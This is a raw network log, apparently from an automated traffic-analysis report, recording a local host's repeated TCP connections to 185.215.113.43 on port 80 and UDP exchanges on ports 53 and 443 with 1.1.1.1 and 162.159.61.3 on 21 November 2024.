                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:52.955821991 CET8050177185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:54.176927090 CET8050177185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:54.176994085 CET5017780192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:54.727144957 CET5017780192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:54.847357035 CET8050177185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:54.851671934 CET5017780192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:55.683686972 CET5017880192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:55.803385973 CET8050178185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:55.803474903 CET5017880192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:55.803772926 CET5017880192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:55.923371077 CET8050178185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:57.232568979 CET8050178185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:57.232856035 CET5017880192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:58.838768005 CET5017880192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:58.839123011 CET5018080192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:58.958935976 CET8050178185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:58.958961010 CET8050180185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:58.959112883 CET5017880192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:58.959120989 CET5018080192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:58.959685087 CET5018080192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:59.079632998 CET8050180185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:00.313141108 CET8050180185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:00.313216925 CET5018080192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:01.824384928 CET5018080192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:01.824733019 CET5018180192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:01.945899963 CET8050181185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:01.945976973 CET5018180192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:01.946012020 CET8050180185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:01.946083069 CET5018080192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:01.946501017 CET5018180192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:02.067691088 CET8050181185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:03.384702921 CET8050181185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:03.391720057 CET5018180192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:05.015703917 CET5018180192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:05.015721083 CET5018280192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:05.135792017 CET8050181185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:05.135915995 CET8050182185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:05.136027098 CET5018180192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:05.136137009 CET5018280192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:05.139697075 CET5018280192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:05.259402037 CET8050182185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:06.493705034 CET8050182185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:06.493773937 CET5018280192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:08.011090040 CET5018280192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:08.011400938 CET5018380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:08.131081104 CET8050183185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:08.131165028 CET5018380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:08.131252050 CET8050182185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:08.131335974 CET5018280192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:08.132091999 CET5018380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:08.251813889 CET8050183185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:09.536072016 CET8050183185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:09.539803028 CET5018380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:11.166985035 CET5018380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:11.167469978 CET5018480192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:11.287053108 CET8050183185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:11.287125111 CET8050184185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:11.287221909 CET5018480192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:11.287270069 CET5018380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:11.287513018 CET5018480192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:11.410490036 CET8050184185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:12.722920895 CET8050184185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:12.722981930 CET5018480192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:14.231518984 CET5018480192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:14.231944084 CET5018580192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:14.351811886 CET8050185185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:14.351887941 CET5018580192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:14.352101088 CET8050184185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:14.352153063 CET5018480192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:14.352327108 CET5018580192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:14.472017050 CET8050185185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:15.734050035 CET8050185185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:15.737824917 CET5018580192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:17.370145082 CET5018580192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:17.374437094 CET5018680192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:17.490524054 CET8050185185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:17.490654945 CET5018580192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:17.494167089 CET8050186185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:17.494340897 CET5018680192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:17.499715090 CET5018680192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:17.619666100 CET8050186185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:18.943212986 CET8050186185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:18.946099997 CET5018680192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:09.553951025 CET5174753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:10.092015028 CET53517471.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:41.062479019 CET5805953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:41.202162027 CET53580591.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:55.446929932 CET53612811.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:55.614888906 CET53593431.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:55.747128963 CET5954553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:55.747296095 CET5134353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:55.884210110 CET53595451.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:55.884414911 CET53513431.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.389655113 CET5969953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.389847040 CET5358153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.531960964 CET53535811.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.532634020 CET5258453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.532836914 CET6115153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.533422947 CET6437353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.533668041 CET6371053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.555814028 CET5459853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.556057930 CET4970953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.677383900 CET53611511.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.678039074 CET53525841.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.678234100 CET53643731.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.678967953 CET53637101.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.708657980 CET53545981.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.708810091 CET53497091.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:06.626144886 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:06.931485891 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.541313887 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.636600971 CET6289053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.636924982 CET5130153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.766055107 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.766086102 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.766098976 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.766258955 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.767528057 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.770507097 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.773762941 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.807219028 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.874216080 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.947014093 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.947384119 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.947766066 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.962184906 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.962184906 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.979012012 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.087486982 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.100692034 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.103388071 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.103399038 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.103408098 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.103415966 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.103992939 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.103992939 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.110403061 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.111118078 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.112572908 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.112639904 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.112648964 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.112834930 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.112838984 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.113171101 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.142824888 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.143188953 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.144882917 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.145708084 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.146018028 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.146756887 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.177970886 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.280291080 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.295002937 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.295861006 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.312115908 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.342075109 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.421154022 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.422588110 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.434396982 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.436014891 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.436506033 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.436664104 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.463630915 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:09.887264967 CET60995443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.196542978 CET60995443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.205593109 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.206226110 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.207395077 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.207650900 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.208204031 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.208519936 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.225703001 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.225831032 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.541954994 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.543675900 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.544429064 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.544531107 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.544540882 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.544641972 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.545150995 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.545262098 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.547038078 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.547274113 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.548763990 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.549063921 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.550458908 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.554465055 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.560585976 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.562129974 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.563282013 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.563653946 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.711946964 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.727874041 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.805864096 CET60995443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.883462906 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.884583950 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.885160923 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.885262966 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.885562897 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.888860941 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.888875961 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.892196894 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.892527103 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.892818928 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.892932892 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:10.893719912 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.045653105 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.047744036 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.056803942 CET44360995162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.056860924 CET44360995162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.056873083 CET44360995162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.056926012 CET44360995162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.059011936 CET60995443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.059613943 CET60995443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.062402010 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.062699080 CET60995443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.064353943 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.065490007 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.129991055 CET44360995162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.222791910 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.224425077 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.228198051 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.230916023 CET44364263162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.231374025 CET64263443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.384042025 CET44360995162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.384375095 CET44360995162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.384383917 CET44360995162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.384392977 CET44360995162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.384991884 CET60995443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.384991884 CET60995443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.385876894 CET44360995162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.708272934 CET44360995162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.741363049 CET60995443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.897905111 CET60995443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.898416996 CET60995443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:12.238511086 CET44360995162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:12.249749899 CET44360995162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:12.253951073 CET44360995162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:12.264631987 CET60995443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:47.544872999 CET6308253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:47.545123100 CET5934653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:47.682447910 CET53593461.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:49.812057972 CET6238753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:49.812057972 CET5015853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.152337074 CET5254553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.152535915 CET6048453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.159936905 CET6288053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.160165071 CET4952353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.292320013 CET53604841.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.301636934 CET4968553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.301794052 CET5633253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.379450083 CET6131753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.379761934 CET5123853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.471117020 CET53525451.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.475274086 CET5101253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.475532055 CET6467353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.517303944 CET53512381.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.538228035 CET53563321.1.1.1192.168.2.5
